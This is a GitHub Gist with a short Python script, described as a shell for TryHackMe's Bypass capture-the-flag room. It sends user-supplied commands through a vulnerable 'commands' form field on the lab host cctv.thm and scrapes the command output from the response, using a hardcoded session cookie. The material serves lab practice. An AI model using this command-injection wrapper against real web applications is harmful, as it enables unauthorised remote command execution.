Created
April 5, 2024 20:25
-
-
Save MillerMedia/b6ab9f3233bd0099cbc7fd9ce2f8ddaf to your computer and use it in GitHub Desktop.
This is a Python shell that can be used with TryHackMe's Bypass room (https://tryhackme.com/r/room/bypass). This is assumed that you use cctv.thm in your /etc/hosts file. You may also need to update your PHPSESSID.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import requests | |
from bs4 import BeautifulSoup | |
import sys | |
import urllib3 | |
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) | |
# Check for command argument | |
if len(sys.argv) != 2: | |
print("Usage: python script.py <command>") | |
sys.exit(1) | |
command = sys.argv[1] | |
# The URL to which the request is sent | |
url = 'https://cctv.thm/index.php' | |
# Custom headers based on your specifications | |
headers = { | |
'Cookie': 'PHPSESSID=8s019p848hmvsr74itbd4mnhar', | |
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0', | |
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8', | |
'Accept-Language': 'en-US,en;q=0.5', | |
'Accept-Encoding': 'gzip, deflate, br', | |
'Content-Type': 'application/x-www-form-urlencoded', | |
'Origin': 'https://cctv.thm', | |
'Referer': 'https://cctv.thm/index.php', | |
'Upgrade-Insecure-Requests': '1', | |
'Sec-Fetch-Dest': 'document', | |
'Sec-Fetch-Mode': 'navigate', | |
'Sec-Fetch-Site': 'same-origin', | |
'Te': 'trailers', | |
'Connection': 'close', | |
} | |
# The data to be sent with the POST request | |
data = { | |
'commands': command, | |
} | |
# Make the POST request, disabling SSL certificate verification | |
response = requests.post(url, headers=headers, data=data, verify=False) | |
# Parse the response to extract the required information | |
soup = BeautifulSoup(response.text, 'html.parser') | |
select = soup.find('select', {'name': 'commands'}) | |
option = select.find('option') | |
if option: | |
content = option.text | |
# Extracting the content after "Current Date" | |
start = content.find("Current Date") + len("Current Date") | |
extracted_content = content[start:].strip() | |
print(extracted_content) | |
else: | |
print("The required form section was not found.") |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment